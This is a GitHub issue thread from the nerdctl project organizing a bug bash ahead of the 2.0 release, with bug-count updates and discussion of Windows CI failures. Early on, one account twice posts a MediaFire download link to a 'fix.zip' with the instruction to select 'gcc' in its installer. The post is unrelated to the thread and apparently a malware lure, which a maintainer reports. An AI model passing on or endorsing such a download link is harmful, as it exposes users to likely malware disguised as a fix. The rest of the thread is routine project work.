### ISSUE TITLE
Bug bash for 2.0

### ISSUE THREAD

**Issue by apostasie** [containerd/nerdctl#3363]
### What is the problem you're trying to solve

Hey folks,

Really pumped-up about 2.0 getting closer :-) - and I thought I would suggest this:
What about a bug bash and shake-up of the bug tracker?

If you good people are open to the idea and have time for that, what about the following for a starter:
- if you have any open PR, rebase them, dust them up, and let's get them merged
- if you have any open issue, go through them and see if they are still current - close if they are no longer current evidently

Then on top of that, we could start tackling *bug reports* from the top:
- we have 46 unconfirmed bugs - https://github.com/containerd/nerdctl/issues?q=is%3Aissue+is%3Aopen+label%3Akind%2Funconfirmed-bug-claim
    - we should be able to cut that in half easily - if you can repro, then fine, label it "bug" - if you can't repro, maybe ping the OP?
- we have 61 confirmed bugs - https://github.com/containerd/nerdctl/issues?q=is%3Aissue+is%3Aopen+label%3Abug
   - I have 8 that are pending close with in-flight PRs
   - I will also probably close 5 more with another "auth/login" PR
   - out of the remaining
      - pretty sure a number of them are no longer current
      - there are definitely some low hanging fruits
      - a bunch of issues wrt flaky tests <- any help on these would be nice - they are tough to crack of course
      - some more involved stuff, but maybe it's a good time to have a look

Tagging @AkihiroSuda @ktock @fahedouch @Zheaoli @djdongjin @yankay @sondavidb 

### Describe the solution you'd like

na

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by apostasie** [comment]
Reported ^

**Comment by sondavidb** [comment]
Thanks for taking the initiative on this! I'll comb through and see if there's anything I can help confirm/fix.

I have one open issue myself (#3156) but it's more of a feature request than a bug, and honestly I can't recall what the ask was when I made this issue. Feel free to close it if we think this is sufficient.

FWIW, I work off a Windows machine so feel free to ping me if you want me to test anything.

**Comment by apostasie** [comment]
> FWIW, I work off a Windows machine so feel free to ping me if you want me to test anything.

@sondavidb 

That's nice. I still need to setup myself with a windows VM but this has taken a backseat in the todo list :(

I guess on my windows radar, these would be interesting to look into:
- #2160 - is this still a problem / relevant?
- #924 - related?

This one is pending next containerd rc:
- #3304

And there is a handful of issues here, where any progress would be lovely:

- https://github.com/containerd/nerdctl/issues?q=is%3Aissue+is%3Aopen+windows+label%3Aplatform%2FWindows%2FNon-WSL2

**Comment by TinaMor** [comment]
@apostasie 

> I guess on my windows radar, these would be interesting to look into:

This PR Allow for binding a named pipe on Windows #2661 addresses #759. _Related PRs: #2160 and #924_

> This one is pending next containerd rc:

Published the PR. Awaiting reviews

> And there is a handful of issues here, where any progress would be lovely:

cc. @lucillex

**Comment by apostasie** [comment]
Thanks a lot @TinaMor

**Comment by apostasie** [comment]
Update:
- confirmed bugs count: 58 (down 3)
- unconfirmed bugs count: 39 (down 7)

Looking good!

We have a somewhat "large", long lasting problem collected in #3425.
Fixing the underlying cause there would likely significantly increase reliability on many operations (chiefly `commit` and `build`), and would certainly close half a dozen confirmed issues.

Help is required on this one, as it is quite tricky.

**Comment by apostasie** [comment]
Windows folks: recent changes in code / or (more likely) tests did break the windows CI significantly (now failing very often) a few weeks ago.

Details are here: #3437

The regression _may_ have been introduced by this PR: #3304 - although this is unconfirmed.

It would be really nice to have windows savvy peeps looking into this :-)

Tagging the windowsians I know of: @sondavidb @TinaMor @jsturtevant

**Comment by apostasie** [comment]
> Windows folks: recent changes in code / or (more likely) tests did break the windows CI significantly (now failing very often) a few weeks ago.

FWIW, I tried adding a sleep inside the test before we call `logs` (5 seconds), just in case things would be slow / racy - it still failed.

**Comment by apostasie** [comment]
Update:

* confirmed bugs count: 49 (total down: **12**)
* unconfirmed bugs count: 44 (total down: 2)

I did open a bunch of new issues myself - as I have been testing very aggressively, so, a better metric might be to look at how many tickets we _closed_ in the past 30 days:

It is actually: **38** 🤯

At this point, the things that feel most important are:
- the windows (regression?) mentioned above
- network related issues - especially the latest opened one, and most importantly the iptables leaks / cluttering

But then, any issue getting fixed, especially around stability, is +100.

**Comment by apostasie** [comment]
Bug-bash-2 followers: we have a new tracker here - #3576 - that is dedicated specifically to the hardcore/high-impact stuff.

Anything we can fix in there will _significantly_ improve stability.

Cheers!

**Comment by AkihiroSuda** [comment]
Closing, as v2 is released
https://github.com/containerd/nerdctl/releases/tag/v2.0.0
